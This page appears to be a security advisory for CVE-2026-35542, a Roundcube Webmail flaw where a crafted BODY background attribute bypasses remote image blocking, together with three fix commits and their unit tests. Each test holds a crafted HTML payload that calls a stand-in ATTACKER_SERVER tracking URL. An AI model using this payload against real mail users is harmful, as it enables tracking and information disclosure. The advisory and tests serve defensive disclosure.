VYPR
Get started
← All advisories
Medium severity5.3NVD Advisory· Published Apr 3, 2026· Updated Apr 7, 2026

CVE-2026-35542

CVE-2026-35542

Description

An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. The remote image blocking feature can be bypassed via a crafted background attribute of a BODY element in an e-mail message. This may lead to information disclosure or access-control bypass.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
roundcube/roundcubemailPackagist
>= 1.7-beta, < 1.7-rc51.7-rc5

Affected products

1

Patches

3
fd0e98178db5

Fix remote image blocking bypass via a crafted body background attribute

https://github.com/roundcube/roundcubemailAleksander MachniakMar 18, 2026via ghsa
commit
3 files changed · +13 0
  • CHANGELOG.md+1 0 modified
    @@ -13,6 +13,7 @@ This file includes only changes we consider noteworthy for users, admins and plu
 - Security: Fix bug where a password could get changed without providing the old password
 - Security: Fix IMAP Injection + CSRF bypass in mail search
 - Security: Fix remote image blocking bypass via various SVG animate attributes
+- Security: Fix remote image blocking bypass via a crafted body background attribute
 
 ## 1.7-rc4
  • program/lib/Roundcube/rcube_washtml.php+5 0 modified
    @@ -416,6 +416,11 @@ private function wash_uri($uri, $blocked_source = false, $is_image = true)
                 return 'data:image/' . $type . ',' . base64_encode($svg);
             }
 
+            // At this point we allow only valid base64 images
+            if (stripos($type, 'base64') === false || preg_match('|[^0-9a-z\s/+]|i', $matches[2])) {
+                return '';
+            }
+
             return $uri;
         }
  • tests/Framework/WashtmlTest.php+7 0 modified
    @@ -271,6 +271,13 @@ public function test_style_body_attrs()
         $this->assertMatchesRegularExpression('|link="#111"|', $washed, 'Body link attribute');
         $this->assertMatchesRegularExpression('|alink="#222"|', $washed, 'Body alink attribute');
         $this->assertMatchesRegularExpression('|vlink="#333"|', $washed, 'Body vlink attribute');
+
+        $html = '<html><body background="data:image/png,x);background:url(//ATTACKER_SERVER/track?uid=test"></body></html>';
+
+        $washer = new \rcube_washtml(['html_elements' => ['body']]);
+        $washed = $washer->wash($html);
+
+        $this->assertMatchesRegularExpression('|x-washed="background"|', $washed, 'Body evil background');
     }
 
     /**
e052328e3dc7

Fix remote image blocking bypass via a crafted body background attribute

https://github.com/roundcube/roundcubemailAleksander MachniakMar 18, 2026via ghsa
commit
3 files changed · +13 0
  • CHANGELOG.md+1 0 modified
    @@ -6,6 +6,7 @@
 - Security: Fix bug where a password could get changed without providing the old password
 - Security: Fix IMAP Injection + CSRF bypass in mail search
 - Security: Fix remote image blocking bypass via various SVG animate attributes
+- Security: Fix remote image blocking bypass via a crafted body background attribute
 
 ## Release 1.5.13
  • program/lib/Roundcube/rcube_washtml.php+5 0 modified
    @@ -424,6 +424,11 @@ private function wash_uri($uri, $blocked_source = false, $is_image = true)
                 return 'data:image/' . $type . ',' . base64_encode($svg);
             }
 
+            // At this point we allow only valid base64 images
+            if (stripos($type, 'base64') === false || preg_match('|[^0-9a-z\s/+]|i', $matches[2])) {
+                return '';
+            }
+
             return $uri;
         }
     }
  • tests/Framework/Washtml.php+7 0 modified
    @@ -247,6 +247,13 @@ function test_style_body_attrs()
         $this->assertRegExp('|link="#111"|', $washed, "Body link attribute");
         $this->assertRegExp('|alink="#222"|', $washed, "Body alink attribute");
         $this->assertRegExp('|vlink="#333"|', $washed, "Body vlink attribute");
+
+        $html = '<html><body background="data:image/png,x);background:url(//ATTACKER_SERVER/track?uid=test"></body></html>';
+
+        $washer = new \rcube_washtml(['html_elements' => ['body']]);
+        $washed = $washer->wash($html);
+
+        $this->assertRegExp('|x-washed="background"|', $washed, 'Body evil background');
     }
 
     /**
fde14d01adc9

Fix remote image blocking bypass via a crafted body background attribute

https://github.com/roundcube/roundcubemailAleksander MachniakMar 18, 2026via ghsa
commit
3 files changed · +19 6
  • CHANGELOG.md+1 0 modified
    @@ -7,6 +7,7 @@
 - Security: Fix bug where a password could get changed without providing the old password
 - Security: Fix IMAP Injection + CSRF bypass in mail search
 - Security: Fix remote image blocking bypass via various SVG animate attributes
+- Security: Fix remote image blocking bypass via a crafted body background attribute
 
 ## Release 1.6.13
  • program/lib/Roundcube/rcube_washtml.php+5 0 modified
    @@ -427,6 +427,11 @@ private function wash_uri($uri, $blocked_source = false, $is_image = true)
                 return 'data:image/' . $type . ',' . base64_encode($svg);
             }
 
+            // At this point we allow only valid base64 images
+            if (stripos($type, 'base64') === false || preg_match('|[^0-9a-z\s/+]|i', $matches[2])) {
+                return '';
+            }
+
             return $uri;
         }
     }
  • tests/Framework/Washtml.php+13 6 modified
    @@ -262,12 +262,19 @@ function test_style_body_attrs()
         $washer = new rcube_washtml(['html_elements' => ['body']]);
         $washed = $washer->wash($html);
 
-        $this->assertMatchesRegularExpression('|bgcolor="#fff"|', $washed, "Body bgcolor attribute");
-        $this->assertMatchesRegularExpression('|text="#000"|', $washed, "Body text attribute");
-        $this->assertMatchesRegularExpression('|background="#test"|', $washed, "Body background attribute");
-        $this->assertMatchesRegularExpression('|link="#111"|', $washed, "Body link attribute");
-        $this->assertMatchesRegularExpression('|alink="#222"|', $washed, "Body alink attribute");
-        $this->assertMatchesRegularExpression('|vlink="#333"|', $washed, "Body vlink attribute");
+        $this->assertMatchesRegularExpression('|bgcolor="#fff"|', $washed, 'Body bgcolor attribute');
+        $this->assertMatchesRegularExpression('|text="#000"|', $washed, 'Body text attribute');
+        $this->assertMatchesRegularExpression('|background="#test"|', $washed, 'Body background attribute');
+        $this->assertMatchesRegularExpression('|link="#111"|', $washed, 'Body link attribute');
+        $this->assertMatchesRegularExpression('|alink="#222"|', $washed, 'Body alink attribute');
+        $this->assertMatchesRegularExpression('|vlink="#333"|', $washed, 'Body vlink attribute');
+
+        $html = '<html><body background="data:image/png,x);background:url(//ATTACKER_SERVER/track?uid=test"></body></html>';
+
+        $washer = new \rcube_washtml(['html_elements' => ['body']]);
+        $washed = $washer->wash($html);
+
+        $this->assertMatchesRegularExpression('|x-washed="background"|', $washed, 'Body evil background');
     }
 
     /**

Vulnerability mechanics

Generated by null/stub on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

9

News mentions

0

No linked articles in our index yet.